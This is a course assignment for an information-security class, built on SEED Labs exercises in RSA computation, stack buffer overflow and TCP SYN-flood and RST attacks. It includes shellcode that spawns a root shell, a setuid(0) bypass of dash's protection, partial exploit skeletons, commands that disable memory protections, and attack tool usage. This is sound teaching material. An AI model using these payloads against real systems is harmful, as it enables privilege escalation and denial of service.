辅导案例-COMS3000/7003-Assignment 1
COMS3000/7003 - Information Security Assignment 1
Contents
1 Lab Setup and Tasks Overview 2
1.1 Setting Up a Local Seed Lab environment . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.2 Your Tasks: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2 Lab Tasks 2
2.1 RSA Public-Key Encryption and Signature Lab . . . . . . . . . . . . . . . . . . . . . . 2
2.1.1 Lab Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
2.1.2 Before Starting Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2.1.3 Task 1: Deriving the Private Key . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.4 Task 2: Encrypting a Message . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.5 Task 3: Decrypting a Message . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
2.1.6 Task 4: Signing a Message . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.1.7 Task 5: Verifying a Signature . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
2.1.8 Supplementary Files And Further References . . . . . . . . . . . . . . . . . . . 6
2.2 Buffer Overflow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.1 Lab Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.2 Before Starting Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
2.2.3 Task 1: Running The Shell Code . . . . . . . . . . . . . . . . . . . . . . . . . . 8
2.2.4 Task 2: Exploiting the Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . 9
2.2.5 Task 3: Defeating dash’s Countermeasure . . . . . . . . . . . . . . . . . . . . . 12
2.2.6 Supplementary Files And Further References . . . . . . . . . . . . . . . . . . . 13
2.3 Attacks On TCP/IP Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.1 Lab Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.2 Before Starting Tasks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.3 Task 1: SYN Flooding Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.3.4 Task 2: TCP RST Attacks on telnet and ssh Connections . . . . . . . . . . . . 16
2.3.5 Task 3: TCP RST Attacks on Video Streaming Applications . . . . . . . . . . 16
2.3.6 Supplementary Files And Further Reference . . . . . . . . . . . . . . . . . . . . 17
3 Submission 17
4 Assessment and Marking 17
1
Due Date: 16 Sep 2020 20:00
The learning objective of this assignment is for students to gain first-hand experience with: Buffer
Overflow Attack, Attacks On TCP/IP Protocol and RSA Public-Key Encryption and
Signature
1 Lab Setup and Tasks Overview
This assignment consists of 11 lab tasks from SEED Labs.
1.1 Setting Up a Local Seed Lab environment
Students need to set up a local seed lab environment, please use image of SEED Ubuntu16.04
VM(32-bit):
1. Seed Labs Image Download
2. Seed Lab Setup Guide
Please consult the tutors in tutorials regarding issues regarding setting up a local seed lab environ-
ment.
1.2 Your Tasks:
1. RSA Public-Key Encryption and Signature Lab Tasks
(a) Deriving the Private Key
(b) Encrypting a Message
(c) Decrypting a Message
(d) Signing a Message
(e) Verifying a Signature
2. Buffer Overflow Attack Tasks
(a) Running Shellcode
(b) Exploiting The Vulnerability
(c) Defense dash’s Countermeasure
3. TCP/IP Attack Lab Tasks
(a) SYN Flooding Attack
(b) TCP RSA Attacks on telnet and ssh Connections
(c) TCP RST Attacks on Vedio Streaming Applications
2 Lab Tasks
2.1 RSA Public-Key Encryption and Signature Lab
2.1.1 Lab Overview
RSA (Rivest Shamir Adleman) is one of the first public-key cryptosystems and is widely used for secure
communication. The RSA algorithm first generates two large random prime numbers, and then use
them to generate public and private key pairs, which can be used to do encryption, decryption, digital
signature generation, and digital signature verification. The RSA algorithm is built upon number
theories, and it can be quite easily implemented with the support of libraries. This lab enhances
2
student’s understanding of RSA by requiring them to go through every essential step of the RSA
algorithm on actual numbers, so they can apply the theories learned from the class. Essentially,
students will be implementing the RSA algorithm using the C program language. The lab covers the
following security-related topics:
• Public-key cryptography
• The RSA algorithm and key generation
• Big number calculation
• Encryption and Decryption using RSA
• Digital signature
• X.509 certificate
2.1.2 Before Starting Tasks
The RSA algorithm involves computations on large numbers. These computations cannot be directly
conducted using simple arithmetic operators in programs, because those operators can only operate
on primitive data types, such as 32-bit integer and 64-bit long integer types. The numbers involved in
the RSA algorithms are typically more than 512 bits long. For example, to multiple two 32-bit integer
numbers a and b, we just need to use a*b in our program. However, if they are big numbers, we cannot
do that any more; instead, we need to use an algorithm (i.e., a function) to compute their products.
There are several libraries that can perform arithmetic operations on integers of arbitrary size. In
this lab, we will use the Big Number library provided by openssl. To use this library, we will define each
big number as a BIGNUM type, and then use the APIs provided by the library for various operations,
such as addition, multiplication, exponentiation, modular operations, etc
BIGNUM APIS: All the big number APIs can be found from https://linux.die.net/man/3/
bn. In the following, we describe some of the APIs that are needed for this lab:
• Some of the library functions requires temporary variables. Since dynamic memory allocation to
create BIGNUMs is quite expensive when used in conjunction with repeated subroutine calls, a
BN CTX structure is created to holds BIGNUM temporary variables used by library functions.
We need to create such a structure, and pass it to the functions that requires it.
BN_CTX *ctx = BN_CTX_new()
• Initialize a BIGNUM variable
BIGNUM *a = BN_new()
• There are a number of ways to assign a value to a BIGNUM variable.
// Assign a value from a decimal number string
BN_dec2bn(&a, "12345678901112231223");
// Assign a value from a hex number string
BN_hex2bn(&a, "2A3B4C55FF77889AED3F");
// Generate a random number of 128 bits
BN_rand(a, 128, 0, 0);
// Generate a random prime number of 128 bits
BN_generate_prime_ex(a, 128, 1, NULL, NULL, NULL);
• Print out a big number.
3
void printBN(char *msg, BIGNUM * a)
{
// Convert the BIGNUM to number string
char * number_str = BN_bn2dec(a);
// Print out the number string
printf("%s %s\n", msg, number_str);
// Free the dynamically allocated memory
OPENSSL_free(number_str);
}
• Compute res = a b and res = a + b:
BN_sub(res, a, b);
BN_add(res, a, b);
• Compute res = a b. It should be noted that a BN CTX structure is need in this API.
BN_mul(res, a, b, ctx)
• Compute res = a b mod n:
BN_mod_mul(res, a, b, n, ctx)
• Compute
res = ac mod n
:
BN_mod_exp(res, a, c, n, ctx)
• Compute modular inverse, i.e., given a, find b, such that a b mod n = 1. The value b is called
the inverse of a, with respect to modular n.
BN_mod_inverse(b, a, n, ctx);
A Complete Example:We show a complete example in the following. In this example, we initialise
three BIGNUM variables, a, b, and n; we then compute a*b and
ab mod n
/* bn_sample.c */
#include
#include
#define NBITS 256
void printBN(char *msg, BIGNUM * a)
{
/* Use BN_bn2hex(a) for hex string
* Use BN_bn2dec(a) for decimal string */
char * number_str = BN_bn2hex(a);
printf("%s %s\n", msg, number_str);
OPENSSL_free(number_str);
}
int main ()
{
BN_CTX *ctx = BN_CTX_new();
BIGNUM *a = BN_new();
BIGNUM *b = BN_new();
4
BIGNUM *n = BN_new();
BIGNUM *res = BN_new();
// Initialize a, b, n
BN_generate_prime_ex(a, NBITS, 1, NULL, NULL, NULL);
BN_dec2bn(&b, "273489463796838501848592769467194369268");
BN_rand(n, NBITS, 0, 0);
// res = a*b
BN_mul(res, a, b, ctx);
printBN("a * b = ", res);
// res = a^b mod n
BN_mod_exp(res, a, b, n, ctx);
printBN("a^c mod n = ", res);
return 0;
}
We can use the following command to compile bn sample.c (the character after - is the letter ‘, not the
number 1; it tells the compiler to use the crypto library).
gcc bn_sample.c -lcrypto
2.1.3 Task 1: Deriving the Private Key
Let p, q, and e be three prime numbers. Let n = p*q. We will use (e, n) as the public key. Please
calculate the private key d. The hexadecimal values of p, q, and e are listed in the following. It should
be noted that although p and q used in this task are quite large numbers, they are not large enough
to be secure. We intentionally make them small for the sake of simplicity. In practice, these numbers
should be at least 512 bits long (the one used here are only 128 bits).
p = F7E75FDC469067FFDC4E847C51F452DF
q = E85CED54AF57E53E092113E62F436F4F
e = 0D88C3
2.1.4 Task 2: Encrypting a Message
Let (e, n) be the public key. Please encrypt the message "A top secret!" (the quotations are not
included). We need to convert this ASCII string to a hex string, and then convert the hex string to
a BIGNUM using the hex-to-bn API BN hex2bn(). The following python command can be used to
convert a plain ASCII string to a hex string.
python -c 'print("A top secret!".encode("hex"))'
# 4120746f702073656372657421
The public keys are listed in the followings (hexadecimal). We also provide the private key d to help
you verify your encryption result.
n = DCBFFE3E51F62E09CE7032E2677A78946A849DC4CDDE3A4D0CB81629242FB1A5
e = 010001 (this hex value equals to decimal 65537)
M = A top secret!
d = 74D806F9F3A62BAE331FFE3F0A68AFE35B3D2E4794148AACBC26AA381CD7D30D
2.1.5 Task 3: Decrypting a Message
The public/private keys used in this task are the same as the ones used in Task 2. Please decrypt the
following ciphertext C, and convert it back to a plain ASCII string.
C = 8C0F971DF2F3672B28811407E2DABBE1DA0FEBBBDFC7DCB67396567EA1E2493F
You can use the following python command to convert a hex string back to to a plain ASCII string.
python -c 'print("4120746f702073656372657421".decode("hex"))'
#A top secret!
5
2.1.6 Task 4: Signing a Message
The public/private keys used in this task are the same as the ones used in Task 2. Please generate a
signature for the following message (please directly sign this message, instead of signing its hash value):
M = I owe you $2000.
Please make a slight change to the message M, such as changing $2000 to $3000, and sign the modified
message. Compare both signatures and describe what you observe.
2.1.7 Task 5: Verifying a Signature
Bob receives a message M = "Launch a missile." from Alice, with her signature S. We know that
Alice’s public key is (e, n). Please verify whether the signature is indeed Alice’s or not. The public
key and signature (hexadecimal) are listed in the following:
M = Launch a missle.
S = 643D6F34902D9C7EC90CB0B2BCA36C47FA37165C0005CAB026C0542CBDB6802F
e = 010001 (this hex value equals to decimal 65537)
n = AE1CD4DC432798D933779FBD46C6E1247F0CF1233595113AA51B450F18116115
Suppose that the signature in is corrupted, such that the last byte of the signature changes from 2F
to 3F, i.e, there is only one bit of change. Please repeat this task, and describe what will happen to
the verification process.
2.1.8 Supplementary Files And Further References
Further References
6
2.2 Buffer Overflow
2.2.1 Lab Overview
Buffer overflow is defined as the condition in which a program attempts to write data beyond the
boundaries of pre-allocated fixed length buffers. This vulnerability can be used by a malicious user to
alter the flow control of the program, leading to the execution of malicious code. This vulnerability
arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return
addresses): an overflow in the data part can affect the control flow of the program, because an overflow
can change the return address.
In this lab, students will be given a program with a buffer-overflow vulnerability; their task is to
develop a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the
attacks, students will be guided to walk through several protection schemes that have been implemented
in the operating system to counter against buffer-overflow attacks. Students need to evaluate whether
the schemes work or not and explain why. This lab covers the following topics:
• Buffer overflow vulnerability and attack
• Stack layout in a function invocation
• Shellcode
2.2.2 Before Starting Tasks
Turning Off Countermeasure: Ubuntu and other Linux distributions have implemented several
security mechanisms to make buffer-overflow attack difficult. To simply our attacks, we need to disable
them first by following the steps below:
• Turn Off Address Randomisation: Ubuntu and several other Linux-based systems uses ad-
dress space randomization to randomize the starting address of heap and stack. This makes
guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-
overflow attacks. In this lab, we disable this feature using the following command:
sudo sysctl -w kernel.randomize_va_space=0
• Turn Off The StackGuard Protection Schema: The GCC compiler implements a security
mechanism called Stack-Guard to prevent buffer overflows. In the presence of this protection,
buffer overflow attacks will not work. We can disable this protection during the compilation
using -fno-stack-protection option. For example, to compile a program call example.c with Stack
Guard disabled, we can do the following:
gcc -fno-stack-protector example.c
• Turn Off Non-Executable Stack: Ubuntu used to allow executable stacks, but this has now
changed: the binary images of this programs as well as shared libraries must declared whether
they require executable stack or not, for example, they need to mark a field in the program
header, kernel or dynamic linker use this marking to decide whether to make the stack of this
running program executable or non-executable. This marking is done automatically by the recent
version of gcc, and by default, stacks are non-executable. To change that, use the following option
when compiling the program
gcc -z execstack -o test test.c
• Configuring /bin/sh for (Ubuntu 16.04 only): In both Ubuntu 12.04 and Ubuntu 16.04
VMs, the /bin/sh symbolic link points to the /bin/dash shell. However, the dash program in these
two VMs have an important difference. The dash shell in Ubuntu 16.04 has a countermeasure
that prevents itself from being executed in a Set-UID process. Basically, if dash detects that it is
executed in a Set-UID process, it immediately changes the effective user ID to the process’s real
7
user ID, essentially dropping the privilege. The dash program in Ubuntu 12.04 does not have
this behaviour.Since our victim program is a Set-UID program, and our attack relies on running
/bin/sh, the countermeasure in /bin/dash makes our attack more difficult. Therefore, we will
link /bin/sh to another shell that does not have such a countermeasure (in later tasks, we will
show that with a little bit more effort, the countermeasure in bin/dash can be easily defeated).
We have installed a shell program called /zsh in our Ubuntu 16.04 VM. We use the following
commands to link /bin/sh to zsh (there is no need to do these in Ubuntu 12.04):
sudo ln -sf /bin/zsh /bin/sh
2.2.3 Task 1: Running The Shell Code
Before starting the attack, let us get familiar with the shellcode. A shellcode is the code to launch a
shell. It has to be loaded into the memory so that we can force the vulnerable program to jump to it.
Consider the following program:
#include
int main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
The shellcode that we use is just the assembly version of the above program. The following program
shows how to launch a shell by executing a shellcode stored in a buffer. Please compile and run the
following code, and see whether a shell is invoked.
/* call_shellcode.c */
/* A program that launches a shell using shellcode */
#include
#include
#include
const char code[] =
"\x31\xc0" /* Line 1: xorl %eax,%eax */
"\x50" /* Line 2: pushl %eax */
"\x68""//sh" /* Line 3: pushl $0x68732f2f */
"\x68""/bin" /* Line 4: pushl $0x6e69622f */
"\x89\xe3" /* Line 5: movl %esp,%ebx */
"\x50" /* Line 6: pushl %eax */
"\x53" /* Line 7: pushl %ebx */
"\x89\xe1" /* Line 8: movl %esp,%ecx */
"\x99" /* Line 9: cdq */
"\xb0\x0b" /* Line 10: movb $0x0b,%al */
"\xcd\x80" /* Line 11: int $0x80 */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );
}
Compile the code above using the following gcc command. Run the program and describe your obser-
vations. Please do not forget to use the execstack option, which allows code to be executed from the
stack; without this option, the program will fail.
8
gcc -z execstack -o call_shellcode call_shellcode.c
The shellcode above invokes the execve() system call to execute /bin/sh. A few places in this
shellcode are worth mentioning. First, the third instruction pushes ”//sh”, rather than ”/sh” into the
stack. This is because we need a 32-bit number here, and ”/sh” has only 24 bits. Fortunately, ”//” is
equivalent to “/”, so we can get away with a double slash symbol. Second, before calling the execve()
system call, we need to store name[0] (the address of the string), name (the address of the array), and
NULL to the %ebx, %ecx, and %edx registers, respectively. Line 5 stores name[0] to %ebx; Line 8
stores name to %ecx; Line 9 sets %edx to zero. There are other ways to set %edx to zero (e.g., xorl
%edx, %edx); the one (cdq) used here is simply a shorter instruction: it copies the sign (bit 31) of
the value in the EAX register (which is 0 at this point) into every bit position in the EDX register,
basically setting %edx to 0. Third, the system call execve() is called when we set %al to 11, and
execute “int $0x80”.
2.2.4 Task 2: Exploiting the Vulnerability
You will be provided with the following program, which has a buffer-overflow vulnerability in Line 1.
Your job is to exploit this vulnerability and gain the root privilege.
/* Vunlerable program: stack.c */
/* You can get this program from the lab’s website */
#include
#include
#include
/* Changing this size will change the layout of the stack.
* Instructors can change this value each year, so students
* won’t be able to use the solutions from the past.
* Suggested value: between 0 and 400 */
#ifndef BUF_SIZE
#define BUF_SIZE 24
#endif
int bof(char *str)
{
char buffer[BUF_SIZE];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
/* Change the size of the dummy array to randomize the parameters
for this lab. Need to use the array at least once */
char dummy[BUF_SIZE]; memset(dummy, 0, BUF_SIZE);
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
The above program has a buffer overflow vulnerability. It first reads an input from a file called
badfile, and then passes this input to another buffer in the function bof(). The original input can have
a maximum length of 517 bytes, but the buffer in bof() is only BUF SIZE bytes long, which is less than
9
517. Because strcpy() does not check boundaries, buffer overflow will occur. Since this program is a
root-owned Set-UID program, if a normal user can exploit this buffer overflow vulnerability, the user
might be able to get a root shell. It should be noted that the program gets its input from a file called
badfile. This file is under users’ control. Now, our objective is to create the contents for badfile, such
that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.
To compile the above vulnerable program, do not forget to turn off the StackGuard and the non-
executable stack protections using the -fno-stack-protector and "-z execstack" options. After the
compilation, we need to make the program a root-owned Set-UID program. We can achieve this by
first change the ownership of the program to root, and then change the permission to 4755 to enable
the Set-UID bit. It should be noted that changing ownership must be done before turning on the
Set-UID bit, because ownership change will cause the Set-UID bit to be turned off.
#compile the program
gcc -DBUF_SIZE=N -o stack -z execstack -fno-stack-protector stack.c
#make the program root owned
sudo chown root stack
# change permission to 4755 to enable the Set-UID bit
sudo chmod 4755 stack
We provide you with a partially completed exploit code called "exploit.c". The goal of this code is
to construct contents for badfile. In this code, the shellcode is given to you. You need to develop the
rest.
/* exploit.c */
/* A program that creates a file containing code for launching shell */
#include
#include
#include
char shellcode[] =
"\x31\xc0" /* Line 1: xorl %eax,%eax */
"\x50" /* Line 2: pushl %eax */
"\x68""//sh" /* Line 3: pushl $0x68732f2f */
"\x68""/bin" /* Line 4: pushl $0x6e69622f */
"\x89\xe3" /* Line 5: movl %esp,%ebx */
"\x50" /* Line 6: pushl %eax */
"\x53" /* Line 7: pushl %ebx */
"\x89\xe1" /* Line 8: movl %esp,%ecx */
"\x99" /* Line 9: cdq */
"\xb0\x0b" /* Line 10: movb $0x0b,%al */
"\xcd\x80" /* Line 11: int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* ... Put your code here ... */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
10
After you finish the above program, compile and run it. This will generate the contents for badfile.
Then run the vulnerable program stack. If your exploit is implemented correctly, you should be able
to get a root shell.
Important: Please compile your vulnerable program first. Please note that the program exploit.c,
which generates the badfile, can be compiled with the default StackGuard protection enabled. This is
because we are not going to overflow the buffer in this program. We will be overflowing the buffer in
stack.c, which is compiled with the StackGuard protection disabled.
gcc -o exploit exploit.c
# create the badfile
./exploit
# launch the attack by running the vulnerable program
./stack
# Bingo! You've got a root shell.
It should be noted that although you have obtained the “#” prompt, your real user id is still yourself
(the effective user id is now root). You can check this by typing the following:
# id
uid=(500) euid=0(root)
you can run the following program to turn the real user id to root. This way, you will have a real root
process, which is more powerful.
void main()
{
setuid(0); system("/bin/sh");
}
Alternative Python Version For exploit.c: For students who are more familiar with Python
than C, we have provided a Python version of the above C code. The program is called exploit.py,Students
need to replace some of the values in the code with the correct ones.
#!/usr/bin/python3
import sys
shellcode= (
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""//sh" # pushl $0x68732f2f
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
"\x99" # cdq
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
"\x00"
).encode(’latin-1’)
# Fill the content with NOP’s
content = bytearray(0x90 for i in range(517))
# Put the shellcode at the end
start = 517 - len(shellcode)
content[start:] = shellcode
#########################################################################
ret = 0xAABBCcDD # replace 0xAABBCCDD with the correct value
11
offset = 0 # replace 0 with the correct value
# Fill the return address field with the address of the shellcode
content[offset:offset + 4] = (ret).to_bytes(4,byteorder=’little’)
#########################################################################
# Write the content to badfile
with open(’badfile’, ’wb’) as f:
f.write(content)
2.2.5 Task 3: Defeating dash’s Countermeasure
As we have explained before, the dash shell in Ubuntu 16.04 drops privileges when it detects that the
effective UID does not equal to the real UID. This can be observed from dash program’s changelog.
We can see an additional check in Line 9, which compares real and effective user/group IDs.
// https://launchpadlibrarian.net/240241543/dash_0.5.8-2.1ubuntu2.diff.gz
// main() function in main.c has following changes:
++ uid = getuid();
++ gid = getgid();
++ /*
++ * To limit bogus system(3) or popen(3) calls in setuid binaries,
++ * require -p flag to work in this situation.
++ */
++ if (!pflag && (uid != geteuid() || gid != getegid())) { // Line 9
++ setuid(uid);
++ setgid(gid);
++ /* PS1 might need to be changed accordingly. */
++ choose_ps1();
++ }
The countermeasure implemented in dash can be defeated. One approach is not to invoke /bin/sh
in our shellcode; instead, we can invoke another shell program. This approach requires another shell
program, such as zsh to be present in the system. Another approach is to change the real user ID of
the victim process to zero before invoking the dash program. We can achieve this by invoking setuid(0)
before executing execve() in the shellcode. In this task, we will use this approach. We will first change
the /bin/sh symbolic link, so it points back to /bin/dash:
sudo ln -sf /bin/dash /bin/sh
To see how the countermeasure in dash works and how to defeat it using the system call setuid(0),
we write the following C program. We first comment out Line 10 and run the program as a Set-UID
program (the owner should be root); please describe your observations. We then uncomment Line 10
and run the program again; please describe your observations.
// dash_shell_test.c
#include
#include
#include
int main()
{
char *argv[2];
argv[0] = "/bin/sh";
argv[1] = NULL;
// setuid(0); // Line 10
execve("/bin/sh", argv, NULL);
return 0;
}
12
The above program can be compiled and set up using the following commands (we need to make it
root-owned Set-UID program):
gcc dash_shell_test.c -o dash_shell_test
sudo chown root dash_shell_test
sudo chmod 4755 dash_shell_test
From the above experiment, we will see that seuid(0) makes a difference. Let us add the assembly
code for invoking this system call at the beginning of our shellcode, before we invoke execve().
char shellcode[] =
"\x31\xc0" /* Line 1: xorl %eax,%eax */
"\x31\xdb" /* Line 2: xorl %ebx,%ebx */
"\xb0\xd5" /* Line 3: movb $0xd5,%al */
"\xcd\x80" /* Line 4: int $0x80 */
// ---- The code below is the same as the one in Task 2 ---
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
The updated shellcode adds 4 instructions: (1) set ebx to zero in Line 2, (2) set eax to 0xd5 via
Line 1 and 3 (0xd5 is /setuid()/’s system call number), and (3) execute the system call in Line 4.
Using this shellcode, we can attempt the attack on the vulnerable program when /bin/sh is linked to
/bin/dash. Using the above shellcode to modify exploit.c or exploit.py ; try the attack from Task 2
again and see if you can get a root shell. Please describe and explain your results.
2.2.6 Supplementary Files And Further References
• Files Needed For This Lab
• Further References
• Computer & Internet Security Chapter 4
13
2.3 Attacks On TCP/IP Protocol
2.3.1 Lab Overview
The vulnerabilities in the TCP/IP protocols represent a special genre of vulnerabilities in protocol
designs and implementations; they provide an invaluable lesson as to why security should be designed
in from the beginning, rather than being added as an afterthought. Moreover, studying these vulner-
abilities help students understand the challenges of network security and why many network security
measures are needed. In this lab, students need to conduct several attacks on the TCP protocol. This
lab covers the following topics:
• TCP SYN flood attack, and SYN cookies
• TCP reset attack
• TCP session hijacking attack
2.3.2 Before Starting Tasks
Network Setup: To conduct this lab, students need to have at least 3 machines. One computer is
used for attacking, the second computer is used as the victim, and the third computer is used as the
observer. Students can set up 3 virtual machines on the same host computer, or they can set up 2
virtual machines, and then use the host computer as the third computer. For this lab, we put all these
three machines on the same LAN, the configuration is described in Figure 1.
Netwox Tools: We need tools to send out network packets of different types and with different
contents. We can use Netwag to do that. However, the GUI interface of Netwag makes it difficult for
us to automate the process. Therefore, we strongly suggest students to use its command-line version,
the Netwox command, which is the underlying command invoked by Netwag. Netwox consists of a
suite of tools, each having a specific number. You can run a command like following (the parameters
depend on which tool you are using). For some of the tool, you have to run it with the root privilege:
sudo netwox number [parameters ... ]
If you are not sure how to set the parameters, you can look at the manual by issuing "netwox
number –help". You can also learn the parameter settings by running Netwag: for each command you
execute from the graphic interface, Netwag actually invokes a corresponding Netwox command, and it
displays the parameter settings. Therefore, you can simply copy and paste the displayed command.
Scapy Tool: Some of the tasks in this lab can also be conducted using Scapy, which is a powerful
interactive packet manipulation program. Scapy is very well maintained and is widely used; while
Netwox is not being maintained any more. There are many online tutorials on Scapy; we expect
students to learn how to use Scapy from those tutorials.
In this lab, students need to conduct attacks on the TCP/IP protocols. They can use the Netwox
tools and/or other tools in the attacks. All the attacks are performed on Linux operating systems.
To simplify the “guess” of TCP sequence numbers and source port numbers, we assume that attackers
are on the same physical network as the victims. Therefore, you can use sniffer tools to get that
information. The following is the list of attacks that need to be implemented.
2.3.3 Task 1: SYN Flooding Attack
SYN flood is a form of DoS attack in which attackers send many SYN requests to a victim’s TCP
port, but the attackers have no intention to finish the 3-way handshake procedure. Attackers either
use spoofed IP address or do not continue the procedure. Through this attack, attackers can flood the
victim’s queue that is used for half-opened connections, i.e. the connections that has finished SYN,
SYN-ACK, but has not yet gotten a final ACK back. When this queue is full, the victim cannot take
any more connection. Figure 1 illustrates the attack.
The size of the queue has a system-wide settings. In Linux, we can check the setting using the
following command:
14
Figure 1: SYN Flooding Attack
sudo sysctl -q net.ipv4.tcp_max_syn_backlog
We can use command "netstat -na" to check the usage of the queue, i.e., the number of halfopened
connection associated with a listening port. The state for such connections is SYN-RECV. If the 3-way
handshake is finished, the state of the connections will be ESTABLISHED. In this task, you need to
demonstrate the SYN flooding attack. You can use the Netwox tool to conduct the attack, and then
use a sniffer tool to capture the attacking packets. While the attack is going on, run the "netstat -na"
command on the victim machine, and compare the result with that before the attack. Please also
describe how you know whether the attack is successful or not. The corresponding Netwox tool for
this task is numbered 76. Here is a simple help screen for this tool. You can also type "netwox 76
–help" to get the help information.
Title: Synflood
Usage: netwox 76 -i ip -p port [-s spoofip]
Parameters:
-i|--dst-ip ip destination IP address
-p|--dst-port port destination port number
-s|--spoofip spoofip IP spoof initialzation type
SYN Cookie Countermeasure: If your attack seems unsuccessful, one thing that you can investigate
is whether the SYN cookie mechanism is turned on. SYN cookie is a defense mechanism to counter
the SYN flooding attack. The mechanism will kick in if the machine detects that it is under the SYN
flooding attack. You can use the sysctl command to turn on/off the SYN cookie mechanism:
sudo sysctl -a | grep cookie # Display the SYN cookie flag
sudo sysctl -w net.ipv4.tcp_syncookies=0 # turn off SYN cookie
sudo sysctl -w net.ipv4.tcp_syncookies=1 # turn on SYN cookie
Please run your attacks with the SYN cookie mechanism on and off, and compare the results. In
your report, please describe why the SYN cookie can effectively protect the machine against the SYN
flooding attack.
Note on Scapy: Although theoretically, we can use Scapy for this task, we have observed that
the number of packets sent out by Scapy per second is much smaller than that by Netwox. This low
rate makes it difficult for the attack to be successful. We were not able to succeed in SYN flooding
attacks using Scapy.
15
2.3.4 Task 2: TCP RST Attacks on telnet and ssh Connections
The TCP RST Attack can terminate an established TCP connection between two victims. For example,
if there is an established telnet connection (TCP) between two users A and B, attackers can spoof a
RST packet from A to B, breaking this existing connection. To succeed in this attack, attackers need
to correctly construct the TCP RST packet. In this task, you need to launch an TCP RST attack
to break an existing telnet connection between A and B. After that, try the same attack on an ssh
connection. Please describe your observations. To simplify the lab, we assume that the attacker and
the victim are on the same LAN, i.e., the attacker can observe the TCP traffic between A and B.
Using Netwox: The corresponding Netwox tool for this task is numbered 78. Here is a simple
help screen for this tool. You can also type "netwox 78 –help" to get the help information.
Title: Reset every TCP packet
Usage: netwox 78 [-d device] [-f filter] [-s spoofip]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
Using Scapy: Please also use Scapy to conduct the TCP RST attack. A skeleton code is provided in
the following (you need to replace each @@@@ with an actual value):
#!/usr/bin/python
from scapy.all import *
ip = IP(src="@@@@", dst="@@@@")
tcp = TCP([email protected]@@@, [email protected]@@@, flags="@@@@", [email protected]@@@, [email protected]@@@)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
2.3.5 Task 3: TCP RST Attacks on Video Streaming Applications
Let us make the TCP RST attack more interesting by experimenting it on the applications that are
widely used in nowadays. We choose the video streaming application in this task. For this task, you
can choose a video streaming web site that you are familiar with (we will not name any specific web
site here). Most of video sharing websites establish a TCP connection with the client for streaming
the video content. The attacker’s goal is to disrupt the TCP session established between the victim
and video streaming machine. To simplify the lab, we assume that the attacker and the victim are on
the same LAN. In the following, we describe the common interaction between a user (the victim) and
some video-streaming web site:
• The victim browses for a video content in the video-streaming web site, and selects one of the
videos for streaming.
• Normally video contents are hosted by a different machine, where all the video contents are
located. After the victim selects a video, a TCP session will be established between the victim
machine and the content server for the video streaming. The victim can then view the video
he/she has selected.
Your task is to disrupt the video streaming by breaking the TCP connection between the victim
and the content server. You can let the victim user browse the video-streaming site from another
(virtual) machine or from the same (virtual) machine as the attacker. Please be noted that, to avoid
liability issues, any attacking packets should be targeted at the victim machine (which is the machine
run by yourself), not at the content server machine (which does not belong to you). You only need to
use Netwox for this task.
16
2.3.6 Supplementary Files And Further Reference
• Further References
• Computer & Internet Security Chapter 16
3 Submission
• For RSA Public-Key Encryption And Signature Lab and Attack On TCP/IP Proto-
col: You need to submit a detailed lab report to describe what you have done and what you
have observed, including screenshots and code snippets. You also need to provide explanation to
the observations that are interesting or surprising. You are encouraged to pursue further inves-
tigation, beyond what is required by the lab description. You can earn bonus points for extra
effort.
• For Buffer Overflow: You need to submit a detailed lab report, with screenshots, to describe
what you have done and what you have observed. You also need to provide explanation to
the observations that are interesting or surprising. Please also list the important code snippets
followed by explanation. Simply attaching code without any explanation will not receive credits.
4 Assessment and Marking
• Deriving the Private Key (5 marks)
• Encrypting a Message (5 marks)
• Decrypting a Message (5 marks)
• Signing a Message (5 marks)
• Verifying a Signature (5 marks)
• Running Shellcode (5 marks)
• Exploiting The Vulnerability (5 marks)
• Defense dash’s Countermeasure (5 marks)
• SYN Flooding Attack (5 marks)
• TCP RSA Attacks on telnet and ssh Connections (5 marks)
